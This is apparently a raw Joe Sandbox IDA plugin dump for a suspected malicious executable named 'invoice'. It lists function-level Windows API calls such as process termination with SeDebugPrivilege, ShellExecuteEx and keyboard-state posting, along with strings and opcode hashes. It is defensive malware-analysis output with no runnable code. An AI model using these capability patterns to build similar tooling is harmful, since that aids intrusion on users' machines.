                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                        • String ID:
                        • API String ID: 1957940570-0
                        • Opcode ID: 804eb3b4c1f0e5a5453be94edbfa24211727fde38faedc841e77e5b1c9c880c9
                        • Instruction ID: 19a32a01725e9b6511d4c79662988815272fbab1781189ad87b74c4a7fd8a9ff
                        • Opcode Fuzzy Hash: 804eb3b4c1f0e5a5453be94edbfa24211727fde38faedc841e77e5b1c9c880c9
                        • Instruction Fuzzy Hash: 3C01B6B5240349BFEB31EBA5DC4DFAB3BACEB89711F004411FA45DB295CA759800DB20
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Variant$ClearInit$_memset
                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                        • API String ID: 2862541840-625585964
                        • Opcode ID: ab5d376ea2cfa7c156d4a13eb38911f6eab246e2953e919a54066af1c14c9a70
                        • Instruction ID: fcbc5558c6082394f738b32552ede71167653402c29f8e0e24033d74c421b4fd
                        • Opcode Fuzzy Hash: ab5d376ea2cfa7c156d4a13eb38911f6eab246e2953e919a54066af1c14c9a70
                        • Instruction Fuzzy Hash: E291BF71E04219ABDF24DFA5C884FAEB7B8EF45720F10855AF605AB290D7B49901DFA0
                        APIs
                          • Part of subcall function 00FD7432: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD736C,80070057,?,?,?,00FD777D), ref: 00FD744F
                          • Part of subcall function 00FD7432: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD736C,80070057,?,?), ref: 00FD746A
                          • Part of subcall function 00FD7432: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD736C,80070057,?,?), ref: 00FD7478
                          • Part of subcall function 00FD7432: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD736C,80070057,?), ref: 00FD7488
                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00FF991B
                        • _memset.LIBCMT ref: 00FF9928
                        • _memset.LIBCMT ref: 00FF9A6B
                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00FF9A97
                        • CoTaskMemFree.OLE32(?), ref: 00FF9AA2
                        Strings
                        • NULL Pointer assignment, xrefs: 00FF9AF0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                        • String ID: NULL Pointer assignment
                        • API String ID: 1300414916-2785691316
                        • Opcode ID: 18b1e5b809b83fe26a8b5497675307fea2e82f5685feae344d7adf537a6ff051
                        • Instruction ID: d7f4d3745809af3bf6096f6cf287ed81cbc2446aa139a41015ce20c02d19d992
                        • Opcode Fuzzy Hash: 18b1e5b809b83fe26a8b5497675307fea2e82f5685feae344d7adf537a6ff051
                        • Instruction Fuzzy Hash: 72916B71D0021DABDB10EFA4DC80AEEBBB8EF08710F20415AF505A7291DB759A40DFA0
                        APIs
                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01006E56
                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 01006E6A
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01006E84
                        • _wcscat.LIBCMT ref: 01006EDF
                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 01006EF6
                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 01006F24
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$Window_wcscat
                        • String ID: SysListView32
                        • API String ID: 307300125-78025650
                        • Opcode ID: d97f3de54040ed021b4c29da1d86d5f7c6fecce357bf51ff544feee66cef872e
                        • Instruction ID: fb5219b1133840fc5bc5e6e0e99fd4b913b9b460daef65c7dc1e8f4bb0dc9bbf
                        • Opcode Fuzzy Hash: d97f3de54040ed021b4c29da1d86d5f7c6fecce357bf51ff544feee66cef872e
                        • Instruction Fuzzy Hash: 7241B170A00348AFEB22DF68CC85BEE77F9EF08350F00046AF585E71D2D67699948B60
                        APIs
                          • Part of subcall function 00FE3C99: CreateToolhelp32Snapshot.KERNEL32 ref: 00FE3CBE
                          • Part of subcall function 00FE3C99: Process32FirstW.KERNEL32(00000000,?), ref: 00FE3CCC
                          • Part of subcall function 00FE3C99: CloseHandle.KERNEL32(00000000), ref: 00FE3D96
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FFEAB8
                        • GetLastError.KERNEL32 ref: 00FFEACB
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FFEAFA
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00FFEB77
                        • GetLastError.KERNEL32(00000000), ref: 00FFEB82
                        • CloseHandle.KERNEL32(00000000), ref: 00FFEBB7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                        • String ID: SeDebugPrivilege
                        • API String ID: 2533919879-2896544425
                        • Opcode ID: ce998819958b1108edd0cbdcaf60e53fb2c40f487221df523f055cc4b0c67c1d
                        • Instruction ID: f023bd8e855941d6a986013db94141480a804745182f0d2aae9cb7abc93376ef
                        • Opcode Fuzzy Hash: ce998819958b1108edd0cbdcaf60e53fb2c40f487221df523f055cc4b0c67c1d
                        • Instruction Fuzzy Hash: 2E41B0316042019FDB25EF54CC95F7DB7A6AF80714F088059FA429B3E2DBB9E804EB85
                        APIs
                        • LoadIconW.USER32(00000000,00007F03), ref: 00FE30CD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: IconLoad
                        • String ID: blank$info$question$stop$warning
                        • API String ID: 2457776203-404129466
                        • Opcode ID: 81b1d2f6e587ffb5e6f72f1827ef6a875657ee09732624df6ece56252b1f2d09
                        • Instruction ID: 7770dd92291d529840e4189938f4aabb081a0f85d47043ebd7d31cd49db4649e
                        • Opcode Fuzzy Hash: 81b1d2f6e587ffb5e6f72f1827ef6a875657ee09732624df6ece56252b1f2d09
                        • Instruction Fuzzy Hash: 32110D3660C787BAD7315A56DC4ED6A77ACDF05338F10806EF70097181DBB56F4066A1
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00FE4353
                        • LoadStringW.USER32(00000000), ref: 00FE435A
                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00FE4370
                        • LoadStringW.USER32(00000000), ref: 00FE4377
                        • _wprintf.LIBCMT ref: 00FE439D
                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FE43BB
                        Strings
                        • %s (%d) : ==> %s: %s %s, xrefs: 00FE4398
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: HandleLoadModuleString$Message_wprintf
                        • String ID: %s (%d) : ==> %s: %s %s
                        • API String ID: 3648134473-3128320259
                        • Opcode ID: 932bfa39be9aa6476557e005d3ebbb90a505f39f94ebcefd3472364abc64e712
                        • Instruction ID: df45eda941532d18b409b3c8753578a65929f6378abb414bfd9a6af650107661
                        • Opcode Fuzzy Hash: 932bfa39be9aa6476557e005d3ebbb90a505f39f94ebcefd3472364abc64e712
                        • Instruction Fuzzy Hash: FC0162F2900209BFE732DBA0DD89EE7776CE708301F000595B785E2041EA799E856B71
                        APIs
                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                        • GetSystemMetrics.USER32(0000000F), ref: 0100D4E6
                        • GetSystemMetrics.USER32(0000000F), ref: 0100D506
                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0100D741
                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0100D75F
                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0100D780
                        • ShowWindow.USER32(00000003,00000000), ref: 0100D79F
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0100D7C4
                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 0100D7E7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                        • String ID:
                        • API String ID: 1211466189-0
                        • Opcode ID: 736f1bcfc4efffc9c22f7d20110863f3dfd69a5efe3181a2bee7b502d4e6f365
                        • Instruction ID: 98dd306c3c440ce37dbf426b900ecbf76852b80bcb6d888ca1bb6dddb71c3776
                        • Opcode Fuzzy Hash: 736f1bcfc4efffc9c22f7d20110863f3dfd69a5efe3181a2bee7b502d4e6f365
                        • Instruction Fuzzy Hash: 0AB19C75500215EFEF26CFACC9C47AD7BF1BF48701F0480A9ED889A299E735A950CB60
                        APIs
                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FBC347,00000004,00000000,00000000,00000000), ref: 00F82ACF
                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00FBC347,00000004,00000000,00000000,00000000,000000FF), ref: 00F82B17
                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00FBC347,00000004,00000000,00000000,00000000), ref: 00FBC39A
                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FBC347,00000004,00000000,00000000,00000000), ref: 00FBC406
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ShowWindow
                        • String ID:
                        • API String ID: 1268545403-0
                        • Opcode ID: 95d767d907133a1ec9c59c3cc7bf02a004f89ca04cdfb310db41c0347a7226ab
                        • Instruction ID: da3a5f33c5b7477d281f74384cc9025b87ee2b6db353eb0fdf6738ad73c34215
                        • Opcode Fuzzy Hash: 95d767d907133a1ec9c59c3cc7bf02a004f89ca04cdfb310db41c0347a7226ab
                        • Instruction Fuzzy Hash: C0412875A04680ABD7BEBB29CC887EB7BD1BF85320F58880DE08786550C67DB841F711
                        APIs
                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00FE7186
                          • Part of subcall function 00FA0F36: std::exception::exception.LIBCMT ref: 00FA0F6C
                          • Part of subcall function 00FA0F36: __CxxThrowException@8.LIBCMT ref: 00FA0F81
                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00FE71BD
                        • EnterCriticalSection.KERNEL32(?), ref: 00FE71D9
                        • _memmove.LIBCMT ref: 00FE7227
                        • _memmove.LIBCMT ref: 00FE7244
                        • LeaveCriticalSection.KERNEL32(?), ref: 00FE7253
                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00FE7268
                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00FE7287
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                        • String ID:
                        • API String ID: 256516436-0
                        • Opcode ID: c446746ffd6d74a45e483b8570d372cc4c9b0d2fbc8f129d4479b8274bf46ef1
                        • Instruction ID: 0128dfd8c7a5f471ee7fdc74318a2e1c274d7642ff12d66c6a4193a3b827e8c2
                        • Opcode Fuzzy Hash: c446746ffd6d74a45e483b8570d372cc4c9b0d2fbc8f129d4479b8274bf46ef1
                        • Instruction Fuzzy Hash: EF31B071904206EFCF20EF65DC85AAE7778EF45310F1481A5F904EB24ADB759E10EBA1
                        APIs
                        • DeleteObject.GDI32(00000000), ref: 0100621D
                        • GetDC.USER32(00000000), ref: 01006225
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 01006230
                        • ReleaseDC.USER32(00000000,00000000), ref: 0100623C
                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 01006278
                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01006289
                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0100905C,?,?,000000FF,00000000,?,000000FF,?), ref: 010062C3
                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 010062E3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                        • String ID:
                        • API String ID: 3864802216-0
                        • Opcode ID: a078251b87c0dc320f76f71473f327607959117e62e10c3e41f1ff7a8b47da66
                        • Instruction ID: a972cf2d64c44b3b856109cb1d7115f2e7bb874ae2608ff1606b47881b30d9ea
                        • Opcode Fuzzy Hash: a078251b87c0dc320f76f71473f327607959117e62e10c3e41f1ff7a8b47da66
                        • Instruction Fuzzy Hash: 7131A072200611BFEB228F64DC49FEB3FA9EF09761F040065FE48DA185C67A9851CBB4
                        APIs
                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                          • Part of subcall function 00F9FE06: _wcscpy.LIBCMT ref: 00F9FE29
                        • _wcstok.LIBCMT ref: 00FEED20
                        • _wcscpy.LIBCMT ref: 00FEEDAF
                        • _memset.LIBCMT ref: 00FEEDE2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                        • String ID: X
                        • API String ID: 774024439-3081909835
                        • Opcode ID: 9be6e6128423944778dd71b383c58dc030afaf06e94f2d5e5212afc0c4e73b0f
                        • Instruction ID: bfbedcf551f9414939990bfc23001a613b8c3f45aad11ac18527f937ab39b486
                        • Opcode Fuzzy Hash: 9be6e6128423944778dd71b383c58dc030afaf06e94f2d5e5212afc0c4e73b0f
                        • Instruction Fuzzy Hash: BDC18F716083419FC724FF24DC85A9AB7E4BF85310F14492DF8999B2A1DB74ED05EB82
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fd0364ccb0745275726afc29741ef3b7cf08fd281e3c35747386f0b30fbf640d
                        • Instruction ID: 3b5015f0f769d5a8166e0f3ab0cfcb0f0f3b8bbb86acd4f3a1852c062a9b7885
                        • Opcode Fuzzy Hash: fd0364ccb0745275726afc29741ef3b7cf08fd281e3c35747386f0b30fbf640d
                        • Instruction Fuzzy Hash: 59717031900109EFDB15DF99CC45AFEBB79FF86320F248249F915AA251C734AA52EF60
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3046bf448ef52738091d6b377e5111af8c37b741e2f3e376aec69790298d04fd
                        • Instruction ID: cb0c83f6271fecd56f35fdcf86fef7a50f13839dd693e0f76ab34199182b25ae
                        • Opcode Fuzzy Hash: 3046bf448ef52738091d6b377e5111af8c37b741e2f3e376aec69790298d04fd
                        • Instruction Fuzzy Hash: 5B61CE76508304ABC720EB24CC86FAFB7E9AF84B10F044919F655972A2DF79DD01E752
                        APIs
                        • IsWindow.USER32(01505478), ref: 0100B41F
                        • IsWindowEnabled.USER32(01505478), ref: 0100B42B
                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0100B50F
                        • SendMessageW.USER32(01505478,000000B0,?,?), ref: 0100B546
                        • IsDlgButtonChecked.USER32(?,?), ref: 0100B583
                        • GetWindowLongW.USER32(01505478,000000EC), ref: 0100B5A5
                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0100B5BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                        • String ID:
                        • API String ID: 4072528602-0
                        • Opcode ID: 989c7a835479b16abbd9018607bdc67a2c589f15fa6c45d6b4758e5f091244e9
                        • Instruction ID: a5e422b510a68e1b6bff24b26e9eaea4a0fea05ea5d805648b36ab1e44ba825a
                        • Opcode Fuzzy Hash: 989c7a835479b16abbd9018607bdc67a2c589f15fa6c45d6b4758e5f091244e9
                        • Instruction Fuzzy Hash: 8D715278601205AFFB72DF58C894FAA7BE5FB09300F1540A9E9D5972D1CB32AA51DB10
                        APIs
                        • _memset.LIBCMT ref: 00FFF55C
                        • _memset.LIBCMT ref: 00FFF625
                        • ShellExecuteExW.SHELL32(?), ref: 00FFF66A
                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                          • Part of subcall function 00F9FE06: _wcscpy.LIBCMT ref: 00F9FE29
                        • GetProcessId.KERNEL32(00000000), ref: 00FFF6E1
                        • CloseHandle.KERNEL32(00000000), ref: 00FFF710
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                        • String ID: @
                        • API String ID: 3522835683-2766056989
                        • Opcode ID: 788bea499cc5b3e545c95de2a147e42db849f0ff1cd8177d22c7138a134ddbe2
                        • Instruction ID: e451b482d55e664da42f41990ffc689cb0766e8c4890e88e32ea3b68b24cf9cb
                        • Opcode Fuzzy Hash: 788bea499cc5b3e545c95de2a147e42db849f0ff1cd8177d22c7138a134ddbe2
                        • Instruction Fuzzy Hash: BB61C075A006199FCF14EF64C8859AEBBF5FF48310F188069E846AB361CB34AD45EB90
                        APIs
                        • GetParent.USER32(?), ref: 00FE12BD
                        • GetKeyboardState.USER32(?), ref: 00FE12D2
                        • SetKeyboardState.USER32(?), ref: 00FE1333
                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00FE1361
                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00FE1380
                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00FE13C6
                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00FE13E9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        • Opcode ID: 2496702346e08df30cc632cb50f17cfb1e58b9699b2dc3ccc12ae575f815758e
                        • Instruction ID: 1738ec1aec016407e22d1f7034ce208d3e83506cecd8c2e9bf947510cadcebe7
                        • Opcode Fuzzy Hash: 2496702346e08df30cc632cb50f17cfb1e58b9699b2dc3ccc12ae575f815758e
                        • Instruction Fuzzy Hash: 6F51C1B0E047D23EFB3686378C45BBABEA97B06314F084589E1D5458C2C6F9A8D4E761
                        APIs
                        • GetParent.USER32(00000000), ref: 00FE10D6
